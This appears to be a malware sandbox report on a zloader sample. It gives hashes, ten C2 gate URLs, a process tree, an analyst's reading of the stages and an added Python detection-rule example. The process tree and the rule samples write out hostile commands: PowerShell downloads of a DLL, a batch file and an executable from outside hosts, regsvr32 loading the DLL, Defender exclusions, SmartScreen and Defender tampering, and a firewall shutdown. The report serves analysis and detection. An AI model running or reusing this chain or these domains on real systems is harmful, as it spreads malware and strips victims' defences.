Analysis
- max time kernel: 31s
- max time network: 102s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 01-08-2021 14:13
Static task: static1
Behavioral task: behavioral1
- Sample: start.EXE
- Resource: win7v20210408
- Errors: none recorded
General
- Target: start.EXE
- Size: 165KB
- MD5: 4a53c91d743e8f9b6551893011d04966
- SHA1: 04e949d7d92e86c07a1e0bc72ae39cf2f950f0d6
- SHA256: 243b5b84bb63e98fb3d54e4e1d8592c367540a79f677a464f2c2ea5491f4c90f
- SHA512: 5614a48c1007193c8b6425e7856d68aa60d8c7e2fc5a7875cb6ce92500e176b21584399eb38f1b34dda82e3880cbac1fca1882d09d8265df4107383e21c54d52
Malware Config
Extracted
- Family: zloader
- Config identifier strings: ivan, ivan (two identifier fields, both carrying the same value)
- C2 gates (ten domains, every one served at /gate.php):
  https://iqowijsdakm.com/gate.php
  https://wiewjdmkfjn.com/gate.php
  https://dksaoidiakjd.com/gate.php
  https://iweuiqjdakjd.com/gate.php
  https://yuidskadjna.com/gate.php
  https://olksmadnbdj.com/gate.php
  https://odsakmdfnbs.com/gate.php
  https://odsakjmdnhsaj.com/gate.php
  https://odjdnhsaj.com/gate.php
  https://odoishsaj.com/gate.php
Signatures
- Blocklisted process makes network request (1 IoC)
  Process: powershell.exe (PID 1776), flow 8
- Downloads MZ/PE file
- Modifies Windows Firewall (1 TTP)
- Loads dropped DLL (1 IoC)
  Process: regsvr32.exe (PID 1684)
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Process: start.EXE
  Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
  Caveat: the wextract_cleanup0 value name, the advpack.dll DelNodeRunDLL32 callback and the IXP000.TMP directory are the standard cleanup mechanism of a Windows IExpress (wextract) self-extracting package. They show that start.EXE is an IExpress SFX that unpacks into %TEMP%\IXP000.TMP and runs start.bat from there; this RunOnce entry only deletes that directory at next logon and should not be read as payload persistence.
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Process: powershell.exe (PID 1776), three occurrences
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: powershell.exe (PID 1776), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (9 IoCs)
  PID 3920 start.EXE wrote to memory of PID 896 cmd.exe (2 events)
  PID 896 cmd.exe wrote to memory of PID 1776 powershell.exe (2 events)
  PID 896 cmd.exe wrote to memory of PID 2132 regsvr32.exe (2 events)
  PID 2132 regsvr32.exe wrote to memory of PID 1684 regsvr32.exe (3 events)
Processes
Process tree as recorded (indentation is parent/child depth; image path, then command line, then PID, then the signatures attributed to that process):
- C:\Users\Admin\AppData\Local\Temp\start.EXE  "C:\Users\Admin\AppData\Local\Temp\start.EXE"  (PID 3920)
  Adds Run key to start application; Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe  cmd /c start.bat  (PID 896)
    Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Invoke-WebRequest https://qmumdjffuiocstjfmdqt.com/JavaN.dll -OutFile JavaN.dll  (PID 1776)
      Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\regsvr32.exe  regsvr32 JavaN.dll  (PID 2132)
      Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\regsvr32.exe  JavaN.dll  (PID 1684)
        Loads dropped DLL
        - C:\Windows\SysWOW64\msiexec.exe  msiexec.exe  (PID 2496)
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Invoke-WebRequest https://qmumdjffuiocstjfmdqt.com/nsudo.bat -OutFile nsudo.bat  (PID 2796)
    - C:\Windows\system32\cmd.exe  cmd /c nsudo.bat  (PID 1972)
      - C:\Windows\system32\cacls.exe  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"  (PID 804)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Invoke-WebRequest https://objtqwwsimibwcmnkrqw.com/javase.exe -OutFile javase.exe  (PID 1404)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"  (PID 3592)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""  (PID 3136)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""  (PID 928)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""  (PID 1640)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""  (PID 3136)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""  (PID 3592)
      - C:\Users\Admin\AppData\Roaming\javase.exe  javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f  (PID 584)
      - C:\Users\Admin\AppData\Roaming\javase.exe  javase -U:T -ShowWindowMode:Hide icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18  (PID 1536)
      - C:\Program Files\Windows Defender\MpCmdRun.exe  MpCmdRun -RemoveDefinitions  (PID 4088)
      - C:\Program Files\Windows Defender\MpCmdRun.exe  MpCmdRun -RemoveDefinitions -Engine  (PID 8)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "netsh advfirewall set allprofiles state off"  (PID 1296)
        - C:\Windows\system32\netsh.exe  "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off  (PID 3788)
      - C:\Windows\system32\shutdown.exe  shutdown.exe /r /t 00  (PID 388)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell Restart-Computer  (PID 1772)
- C:\Windows\system32\LogonUI.exe  "LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d  (PID 852)

Reading the tree:
- Stage 1 (start.bat): PowerShell fetches JavaN.dll and regsvr32 registers it. The 64-bit regsvr32 hands the file to its SysWOW64 copy, which is what regsvr32 does for a 32-bit DLL; that copy loads the dropped DLL and spawns msiexec.exe.
- Stage 2 (nsudo.bat): the cacls call against system32\config\system is the common batch idiom for testing whether the script is running elevated (cacls fails on that hive for non-administrators). javase.exe is invoked with NSudo-style switches (-U:T runs the child as TrustedInstaller, -ShowWindowMode:Hide hides its window), consistent with the script's name. Under that token the script suppresses Defender notifications (Notification_Suppress), strips the ACL on smartscreen.exe (removing Administrators S-1-5-32-544, Authenticated Users S-1-5-11, Users S-1-5-32-545 and SYSTEM S-1-5-18, so the binary can no longer be executed), calls MpCmdRun -RemoveDefinitions with and without -Engine, turns the firewall off on all profiles, and forces a reboot twice over (shutdown /r /t 00 and Restart-Computer).
- The Add-MpPreference exclusions cover the Roaming directory that javase.exe runs from, regsvr32, the ".exe" and ".dll" strings, explorer.exe and "iexplorer.exe" (the misspelling is as typed by the script).
- PIDs 3136 and 3592 each appear twice in the report as shown; the LogonUI.exe entry is the lock-screen process after the forced reboot.
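The Defender-tampering chain above is easier to detect as a set of related process-creation events than as any single command line. The following is an added example, not part of this sandbox report: detection rules run over process-creation records constructed from the tree above (image names only, paths dropped, plus one benign control). The ProcEvent shape, the rule names and the three-distinct-rules verdict threshold are this example's own choices.

```python
"""Added example: detection rules for the defence-evasion chain in the process
tree above, run over process-creation records. Not sandbox output; the event
shape, rule names and the verdict threshold are this example's own."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (the fields a Sysmon EID 1 or EDR record carries)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


# Constructed from the report's process tree (image names only, full paths dropped);
# the last record is a benign control that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(896, "start.EXE", "cmd.exe", "cmd /c start.bat"),
    ProcEvent(1776, "cmd.exe", "powershell.exe",
              "powershell Invoke-WebRequest https://qmumdjffuiocstjfmdqt.com/JavaN.dll -OutFile JavaN.dll"),
    ProcEvent(2132, "cmd.exe", "regsvr32.exe", "regsvr32 JavaN.dll"),
    ProcEvent(3592, "cmd.exe", "powershell.exe",
              "powershell -inputformat none -outputformat none -NonInteractive -Command "
              "\"Add-MpPreference -ExclusionProcess '\"C:\\Users\\Admin\\AppData\\Roaming'\""),
    ProcEvent(928, "cmd.exe", "powershell.exe",
              'powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""'),
    ProcEvent(584, "cmd.exe", "javase.exe",
              'javase -U:T reg add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration" '
              '/v "Notification_Suppress" /t REG_DWORD /d "1" /f'),
    ProcEvent(1536, "cmd.exe", "javase.exe",
              'javase -U:T -ShowWindowMode:Hide icacls "C:\\Windows\\System32\\smartscreen.exe" '
              '/inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18'),
    ProcEvent(4088, "cmd.exe", "MpCmdRun.exe", "MpCmdRun -RemoveDefinitions"),
    ProcEvent(3788, "powershell.exe", "netsh.exe",
              '"C:\\Windows\\system32\\netsh.exe" advfirewall set allprofiles state off'),
    ProcEvent(1234, "explorer.exe", "powershell.exe", "powershell Get-MpPreference"),  # benign control
]

# Command-line rules. Each matches one step of the chain; a single hit is weak
# evidence, several distinct hits on one host in a short window is the chain itself.
RULES = [
    ("powershell_download_to_disk",
     re.compile(r"Invoke-WebRequest\s+https?://\S+\s+-OutFile\s+\S+\.(dll|exe|bat)\b", re.I)),
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\s+-Exclusion(Process|Path|Extension)", re.I)),
    ("defender_notifications_suppressed",
     re.compile(r"Windows Defender\\UX Configuration.*Notification_Suppress", re.I)),
    ("smartscreen_acl_stripped",  # S-1-5-18 is the SYSTEM SID
     re.compile(r"icacls\b.*smartscreen\.exe.*/remove\b.*\*S-1-5-18\b", re.I)),
    ("defender_definitions_removed",
     re.compile(r"MpCmdRun(\.exe)?\s+-RemoveDefinitions", re.I)),
    ("firewall_disabled_all_profiles",
     re.compile(r"advfirewall\s+set\s+allprofiles\s+state\s+off", re.I)),
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe"}


def match_rules(ev: ProcEvent) -> list[str]:
    """Rule names whose pattern matches the command line, plus one lineage rule:
    regsvr32 registering a DLL directly from a cmd/powershell parent."""
    names = [name for name, rx in RULES if rx.search(ev.command_line)]
    if (ev.image.lower() == "regsvr32.exe"
            and ev.parent_image.lower() in SCRIPT_HOSTS
            and re.search(r"\.dll\b", ev.command_line, re.I)):
        names.append("regsvr32_dll_from_script_host")
    return names


def evaluate(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map pid -> matched rule names, omitting events that matched nothing."""
    hits: dict[int, list[str]] = {}
    for ev in events:
        names = match_rules(ev)
        if names:
            hits[ev.pid] = names
    return hits


def verdict(hits: dict[int, list[str]], min_distinct_rules: int = 3) -> str:
    """Escalate only when several different chain steps were seen, not one noisy rule."""
    distinct = {name for names in hits.values() for name in names}
    return "defender-tampering-chain" if len(distinct) >= min_distinct_rules else "no-chain"


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for pid, names in found.items():
        print(f"pid {pid}: {', '.join(names)}")
    print("verdict:", verdict(found))
```

On the sample records eight of the ten events fire, seven distinct rules in all, and only the `cmd /c start.bat` launch and the benign `Get-MpPreference` control stay silent. The threshold is deliberately on distinct rules rather than raw hits: an administrator adding several exclusions in a row trips one rule many times, whereas the chain here trips the exclusion, definition-removal, firewall and SmartScreen rules together, which is what an analyst would escalate on.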
Network
MITRE ATT&CK Enterprise v6
Downloads
Seventeen downloaded files are listed by hash only; file names and source URLs are not present in this extract. Entry 15 repeats the hashes of entry 14 and entry 17 repeats entry 13, i.e. the same content was fetched more than once.
- Download 1
  MD5: 56efdb5a0f10b5eece165de4f8c9d799
  SHA1: fa5de7ca343b018c3bfeab692545eb544c244e16
  SHA256: 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
  SHA512: 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
- Download 2
  MD5: f7344917f4158a8ef6264dfd5ec7825e
  SHA1: 4c02001b020e41c2d3f61eef0e535fcc3ccbce50
  SHA256: fb22ee01affa2b936b365ac7a783251b9c3677f5858fe439a749737a41292dbd
  SHA512: abee904f01171c8e2f3988746066be3b018f9d79b2a4c8dc0abbf41d99671e0bba9f4275b29b0e00b32eb44d83205387fe3184ec86e72eeab88dd0b3d2f9ca0a
- Download 3
  MD5: df4d2f0f806e5d9a39e531e4e563845c
  SHA1: d260b6ed3880aefb56224a19598ccdfefba615a4
  SHA256: 16c3f0586b1e443adcd11cd3faebe46b5a15b6a452ad9d0ad92034bb9d1b3ff0
  SHA512: 82fde55d2a59b3a8b655f3174d53bf961527432ee8ee0e6a6089c562c56bb3fc469508e9706cfeeb1a3d328aaff03c0ae1f168c7ecb6977ae3fbb1246fbb60be
- Download 4
  MD5: 490358c626e163e8cfd8e31a716b5e40
  SHA1: cda2e838aeafa043e3da2512ae3d19fadf064167
  SHA256: 2ed758eb7f40fc54df8a4215f91871ec1d58d61743195ad44328aafe385914d3
  SHA512: c9633d7d4fdd78d5d64924caa0892407a04f122340058bf246a846a90a4ff0db0059372e2edb726e0ad75d3955eddd836fbb7666f63f4289a634c6bc0f294f94
- Download 5
  MD5: 2f697e3f92c0a98bf8b63cad323b8872
  SHA1: 3fafe03f526f2837573ef2214b25de1a08b8d3e7
  SHA256: 652c4ce21094b6d414379dbb29d6befe488b5d08e079d9265018f81bb70937e2
  SHA512: f6c6ddf7537b6c49852768a110c7d298fbc40fa4eff8902c84546786789f694e161095bd9a288a0b9d355301572fcc5c5e21e56dac36d0e153626abb7b675104
- Download 6
  MD5: 77fed1cc5c5166740e0e04975f64b171
  SHA1: 67c47b610836200f6003fce22b648ce0696260bf
  SHA256: ed7a1e4b04a2c1d9ef86ae6fb2c7642ef3489bd76c3a0bf8308afbf61161a769
  SHA512: 7132e5fae382c51bd0a78be2357bd8300107558e3e4426a8de96dcd7f05970d7bd42be0c542f20f58582ae6640b4086677053050a3f1ff4cdb5db2130cbe237d
- Download 7
  MD5: 7de54f12281ba91ec64917853a282624
  SHA1: 9584eae25a38e81c6b4ade6e820eca49a3c31241
  SHA256: 50f4d3258eb760f5cea762932c8af61df6934a561857c8d827cbc6746ba6df37
  SHA512: bc8daa14403714713a06edbefc167ca15b95fa1998984688f1adb84b264b5f7f248c27790259c11a115b378a031891db659785356636526f74182bc1f9f0de64
- Download 8
  MD5: 183d9d22d40c1ab1e8d6f008b53477de
  SHA1: 7e3e32de50e5e14c38d9b056c3ae01a4c22b5c06
  SHA256: 0477774baf7e8b5b46dbe104a971a42a1272443c6740238924aca3d9fb83d2db
  SHA512: bcddbdd5b3f0a75d1997473490b09a6a082e061f3a13365cd0f2856110f8075f4e6db842c9871d03677c7b4192316c475146ca93a17cbdf80636db3bc1d7ea35
- Download 9
  MD5: 968504d7cacafe7167271ff79a4fd277
  SHA1: cd01083bff3a580baa8a097b4520ef9e75e1278c
  SHA256: 31cce5ba8614ef26951bcadf2728ee20f8d37f8c675b886233606dff1fe2ebfd
  SHA512: 4c8641800c368c8fa753a54dd8617dfc97527b81775c0cb56fee4b77111d36fa0cd87b49a136dfa3ea6e92937f38d3425585faa3d45eca87d89cba52758f0872
- Download 10
  MD5: 447be9ebfadb3c3cb4da566c6cb0e42a
  SHA1: afb8b37cab651cc393edc403261dad4868e82e85
  SHA256: ba8cf998c0d7ad902c8d4f1918532db907a78d3823fe29a37b7d19e776e3b475
  SHA512: b7155ca37dcc429131d2a26a83efc2c844744f98c11b150104e4ee45c50e129b38b0c82143c40b71800dce2fba2a0cb88fd096830623fa6b5550681b440c1c43
- Download 11
  MD5: 39d3cb1f3eeeb8dcc30fe4bcb7b69118
  SHA1: f3ba55d96e44102e2f4f55169d3ad4f0250cb4ce
  SHA256: fe1d4880e9c6906690a10089700473011517aeb5763b0c3b74b7ab6fa71d32f9
  SHA512: 69249e519060b980407a5973e8dc12353d7a7ab217c598255aa5d83bdd73562ceb5bac7425bfe7981ecf90c5723bfa84323c777b7269c78b3e8b200b3cee78b9
- Download 12
  MD5: ea96962aa92b9271cacf64113e773aed
  SHA1: f57c95747d6655dd0904371053bf8f707ade8056
  SHA256: b2b6b6e2cdf2bf4c3af67e9d1fa17eba45e113fd3821f46797724644f1bdaaf8
  SHA512: 78b9296bb1cbe1191999ee2043fc2280e55c66033d57385c41a1cd03ff70dc37ebdb6a4a642d8b04303e84b85921e0090a01a261a37dc24330d7ef99b7b0fa41
- Download 13
  MD5: 348d6fd40a9e79a681048999873af548
  SHA1: 069f292e298dabc97a7946c25b8833abf0783dc1
  SHA256: 6819b89e1dba92ee4c6eaa7e35880a6d8e1b51047ec4fed392d29a9aeb8e36b7
  SHA512: 7d75ff10763fbf72f0b6a13dbb8f429b6820379f118afd303dad2e2e9c358ea1d220a3afe05d5d949608ee39135f86b27dede86c9062b0ee5b98d0b1591b001e
- Download 14
  MD5: 5cae01aea8ed390ce9bec17b6c1237e4
  SHA1: 3a80a49efaac5d839400e4fb8f803243fb39a513
  SHA256: 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
  SHA512: c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
- Download 15 (same hashes as download 14)
  MD5: 5cae01aea8ed390ce9bec17b6c1237e4
  SHA1: 3a80a49efaac5d839400e4fb8f803243fb39a513
  SHA256: 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
  SHA512: c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
- Download 16
  MD5: 751d7686d93c66a71f07b3437348d632
  SHA1: 5643bed79a4beb1ac278994ca1e32dc3208da97b
  SHA256: 4cb46cf91fd3d098c0405db0044654c15368e971a3943d47829862ecef994829
  SHA512: 3fbee16d97727cac9a7ab389e650491ef722f908968bd0ee9d21aea86ad8ee838c14282e61188fd18db6226fb5be366d3a46c91aedbff7895ec1b91ab1e9e1f9
- Download 17 (same hashes as download 13)
  MD5: 348d6fd40a9e79a681048999873af548
  SHA1: 069f292e298dabc97a7946c25b8833abf0783dc1
  SHA256: 6819b89e1dba92ee4c6eaa7e35880a6d8e1b51047ec4fed392d29a9aeb8e36b7
  SHA512: 7d75ff10763fbf72f0b6a13dbb8f429b6820379f118afd303dad2e2e9c358ea1d220a3afe05d5d949608ee39135f86b27dede86c9062b0ee5b98d0b1591b001e